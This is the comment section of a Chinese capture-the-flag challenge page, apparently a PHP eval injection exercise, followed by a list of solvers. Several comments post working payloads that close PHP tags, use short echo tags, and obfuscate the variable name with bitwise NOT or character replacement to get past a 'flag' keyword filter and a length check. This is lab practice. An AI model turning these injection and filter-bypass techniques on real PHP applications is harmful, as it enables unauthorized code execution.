评分(6)
解题动态
NosajUx 攻破了该题 23小时前
青云07 攻破了该题 1天前
simple9527 攻破了该题 1天前
z231288 攻破了该题 2天前
luobosir 攻破了该题 3天前
dwx386572657 攻破了该题 5天前
天天1 攻破了该题 6天前
GrantFly 攻破了该题 6天前
15079182261 攻破了该题 9天前
Mark jiang 攻破了该题 9天前
lvchijing 攻破了该题 12天前
ailiyishen 攻破了该题 15天前
baizhi白栀 攻破了该题 15天前
星落. 攻破了该题 16天前
ljy1997 攻破了该题 21天前
杰哥 攻破了该题 22天前
周文君 攻破了该题 22天前
不要逃课 攻破了该题 24天前
DcSyaA 攻破了该题 26天前
评论
周文君 22天前
举报
?flag=$a='fla1';$a{********}='g';?><?=$$a;?>111111111111111111
suxiansheng 1月前
举报
闭合绕过 + 短标签输出 详情参考https://blog.csdn.net/wangsu327/article/details/161545391?spm=1011.2124.3001.6209
FTJJJ 3月前
举报
?flag=$a=~'%99%93%9E%98';?><?= $$a ?>aaaaaaaaaaaaaaaaaaaaaaaaaa
harry2025 6月前
举报
eval()内出现孤立<,必报unexpected '<'错误,无例外。
网恋秀牛子被录屏导致自卑 6月前
举报
考察了闭合,还有短标签
南交混的入朱靖宇 7月前
举报
flag被过滤,构建$a='fla1';$a{*********}='g'; // 把字符串的第 4 个字符改成 g题里要求:strlen($_GET['flag']) == strlen($exam),而 $exam 的长度是 49。
Alune 7月前
举报
个人理解eval构造中存在<? ?> payload 第一个?>中与前一个闭合 而让后面的当作代码执行,不闭合的话后面就是<? <? ?> ?>代码嵌套代码了,会报错
孙谦的鸟岛 9月前
举报
孙千的**来咯
派大星CTF 1年前
举报
eavl()会开启新的php标签,而不是闭合第一行代码的标签所以需要结束eval里开启的标签,在开启一个php代码来执行输出$flag
YUMEKO 2年前
举报
http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333